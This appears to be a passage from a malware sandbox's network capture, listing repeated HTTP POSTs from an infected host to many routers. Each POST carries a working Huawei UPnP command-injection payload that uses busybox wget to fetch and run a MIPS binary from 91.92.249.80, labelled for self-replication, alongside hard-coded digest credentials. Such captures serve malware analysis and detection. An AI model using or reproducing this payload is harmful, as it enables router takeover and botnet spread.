                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1066192.168.2.2333346154.220.129.22937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298351049 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1067192.168.2.233371289.188.23.24037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298491001 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1068192.168.2.2352040108.90.72.237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298516035 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1069192.168.2.2347818197.43.111.137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298516035 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1070192.168.2.2352756157.105.164.3237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298523903 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1071192.168.2.2357130201.35.70.25237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298544884 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1072192.168.2.2339120123.124.189.14737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298544884 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1073192.168.2.235797241.167.107.2037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298561096 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1074192.168.2.2344558171.203.219.1237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298563957 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1075192.168.2.2337066185.105.162.5937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298588037 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1076192.168.2.235351241.106.185.8537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.298597097 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
